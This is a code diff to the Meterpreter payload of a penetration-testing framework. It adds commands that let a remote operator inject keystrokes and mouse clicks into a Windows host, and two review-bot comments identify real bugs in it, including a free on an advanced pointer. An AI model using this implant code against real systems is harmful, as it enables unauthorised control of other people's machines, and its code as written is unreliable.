diff --git a/c/meterpreter/source/extensions/stdapi/server/stdapi.c b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
index 32d6660e..b5c99b20 100644
--- a/c/meterpreter/source/extensions/stdapi/server/stdapi.c
+++ b/c/meterpreter/source/extensions/stdapi/server/stdapi.c
@@ -143,6 +143,8 @@ Command customCommands[] =
 COMMAND_REQ("stdapi_ui_desktop_get", request_ui_desktop_get),
 COMMAND_REQ("stdapi_ui_desktop_set", request_ui_desktop_set),
 COMMAND_REQ("stdapi_ui_desktop_screenshot", request_ui_desktop_screenshot),
+ COMMAND_REQ("stdapi_ui_send_keys", request_ui_send_keys),
+ COMMAND_REQ("stdapi_ui_send_mouse", request_ui_send_mouse),
 // Event Log
 COMMAND_REQ("stdapi_sys_eventlog_open", request_sys_eventlog_open),
diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
index 52f95317..d0255c1a 100644
--- a/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/keyboard.c
@@ -350,6 +350,48 @@ DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request)
 return ERROR_SUCCESS;
 }
+/*
+ * Send keystrokes
+ */
+
+DWORD request_ui_send_keys(Remote *remote, Packet *request)
+{
+ Packet *response = packet_create_response(request);
+ DWORD result = ERROR_SUCCESS;
+ wchar_t *keys = utf8_to_wchar(packet_get_tlv_value_string(request, TLV_TYPE_KEYS_SEND));
+ if (keys)
+ {
+ INPUT input[2] = {0};
+ input[0].type = INPUT_KEYBOARD;
+ input[0].ki.time = 0;
+ input[0].ki.wVk = 0;
+ input[0].ki.dwExtraInfo = 0;
+ input[0].ki.dwFlags = KEYEVENTF_UNICODE;
+ input[1].type = INPUT_KEYBOARD;
+ input[1].ki.time = 0;
+ input[1].ki.wVk = 0;
+ input[1].ki.dwExtraInfo = 0;
+ input[1].ki.dwFlags = KEYEVENTF_UNICODE | KEYEVENTF_KEYUP;
+ while (*keys != 0)
+ {
+ input[0].ki.wScan = *keys;
+ input[1].ki.wScan = *keys;
+ SendInput(2, input, sizeof(INPUT));
+ keys++;
+ }
+ free(keys);
+ }
+ else
+ {
+ result = 1;
+ }
+
+ // Transmit the response
+ packet_transmit_response(result, remote, response);
+ return ERROR_SUCCESS;
+}
+
+
 /*
 * log keystrokes and track active window
 */
diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c b/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c
index ae7f7bdd..845ed708 100644
--- a/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/mouse.c
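Review bot: `free(keys)` in `request_ui_send_keys` runs after the `while` loop has advanced `keys` to the terminating NUL, so for any non-empty string the pointer passed to `free` is not the one `utf8_to_wchar` returned (the `free` implies that helper hands back a heap block), which is undefined behaviour and likely heap corruption. Walk a separate cursor, `for (wchar_t *p = keys; *p != 0; p++)`, and free the original pointer. The `SendInput` return value is also ignored, so a request whose events were not inserted (for example when UIPI blocks the injection) still reports success; `if (SendInput(2, input, sizeof(INPUT)) != 2) { result = GetLastError(); break; }` would surface that. `result = 1` would read better as a named code such as `ERROR_INVALID_PARAMETER`, and it is worth confirming that `utf8_to_wchar` tolerates the NULL that `packet_get_tlv_value_string` presumably returns when the TLV is absent.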
@@ -34,3 +34,79 @@ DWORD request_ui_enable_mouse(Remote *remote, Packet *request)
 return ERROR_SUCCESS;
 }
+
+
+/*
+ * Send keystrokes
+ */
+
+DWORD request_ui_send_mouse(Remote *remote, Packet *request)
+{
+ Packet *response = packet_create_response(request);
+ DWORD result = ERROR_SUCCESS;
+
+ DWORD action = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_ACTION);
+ DWORD x = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_X);
+ DWORD y = packet_get_tlv_value_uint(request, TLV_TYPE_MOUSE_Y);
+
+ INPUT input = {0};
+ input.type = INPUT_MOUSE;
+ input.mi.mouseData = 0;
+ if (action == 0)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_MOVE;
+ }
+ else if (action == 1)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
+ }
+ else if (action == 2)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_LEFTDOWN;
+ }
+ else if (action == 3)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_LEFTUP;
+ }
+ else if (action == 4)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
+ }
+ else if (action == 5)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_RIGHTDOWN;
+ }
+ else if (action == 6)
+ {
+ input.mi.dwFlags = MOUSEEVENTF_RIGHTUP;
+ }
+ if (x != -1 || y != -1)
+ {
+ double width = GetSystemMetrics(SM_CXSCREEN)-1;
+ double height = GetSystemMetrics(SM_CYSCREEN)-1;
+ double dx = x*(65535.0f / width);
+ double dy = y*(65535.0f / height);
+ input.mi.dx = (LONG)dx;
+ input.mi.dy = (LONG)dy;
+ input.mi.dwFlags |= MOUSEEVENTF_ABSOLUTE;
+ }
+ SendInput(1, &input, sizeof(INPUT));
+ if (action == 1)
+ {
+ input.mi.dwFlags &= ~(MOUSEEVENTF_LEFTDOWN);
+ input.mi.dwFlags |= MOUSEEVENTF_LEFTUP;
+ SendInput(1, &input, sizeof(INPUT));
+ }
+ else if (action == 4)
+ {
+ input.mi.dwFlags &= ~(MOUSEEVENTF_RIGHTDOWN);
+ input.mi.dwFlags |= MOUSEEVENTF_RIGHTUP;
+ SendInput(1, &input, sizeof(INPUT));
+ }
+
+ // Transmit the response
+ packet_transmit_response(result, remote, response);
+ return ERROR_SUCCESS;
+}
+
+
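Review bot: An `action` value outside 0–6 falls through the `if`/`else if` chain in `request_ui_send_mouse` with `dwFlags` still zero, yet `SendInput` is called and the response always carries `ERROR_SUCCESS`; a final `else { result = ERROR_INVALID_PARAMETER; }` with the `SendInput` calls skipped on that path would make a malformed request visible to the caller. The coordinate test `x != -1 || y != -1` also scales a lone `-1` (0xFFFFFFFF as a `DWORD`) and casts the out-of-range double to `LONG`; if the intent is that both coordinates must be supplied, `x != -1 && y != -1` is the safer condition. The header comment was copied from keyboard.c and should read `Send mouse events`, and the numeric action codes deserve a short comment or enum, since 1 and 4 appear to be full clicks while 2/3 and 5/6 are the separate press and release.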
diff --git a/c/meterpreter/source/extensions/stdapi/server/ui/ui.h b/c/meterpreter/source/extensions/stdapi/server/ui/ui.h
index d62ae5c2..6738cc28 100644
--- a/c/meterpreter/source/extensions/stdapi/server/ui/ui.h
+++ b/c/meterpreter/source/extensions/stdapi/server/ui/ui.h
@@ -12,6 +12,9 @@ DWORD request_ui_stop_keyscan(Remote *remote, Packet *request);
 DWORD request_ui_get_keys(Remote *remote, Packet *request);
 DWORD request_ui_get_keys_utf8(Remote *remote, Packet *request);
+DWORD request_ui_send_keys(Remote *remote, Packet *request);
+DWORD request_ui_send_mouse(Remote *remote, Packet *request);
+
 DWORD request_ui_desktop_enum( Remote * remote, Packet * request );
 DWORD request_ui_desktop_get( Remote * remote, Packet * request );
 DWORD request_ui_desktop_set( Remote * remote, Packet * request );
diff --git a/c/meterpreter/source/extensions/stdapi/stdapi.h b/c/meterpreter/source/extensions/stdapi/stdapi.h
index 44934865..72fa6127 100755
--- a/c/meterpreter/source/extensions/stdapi/stdapi.h
+++ b/c/meterpreter/source/extensions/stdapi/stdapi.h
@@ -187,6 +187,10 @@
 #define TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3012 )
 #define TLV_TYPE_KEYSCAN_TRACK_ACTIVE_WINDOW MAKE_CUSTOM_TLV( TLV_META_TYPE_BOOL, TLV_TYPE_EXTENSION_STDAPI, 3013 )
+#define TLV_TYPE_KEYS_SEND MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 3014 )
+#define TLV_TYPE_MOUSE_ACTION MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3015 )
+#define TLV_TYPE_MOUSE_X MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3016 )
+#define TLV_TYPE_MOUSE_Y MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 3017 )
 // Event Log
 #define TLV_TYPE_EVENT_SOURCENAME MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 4000 )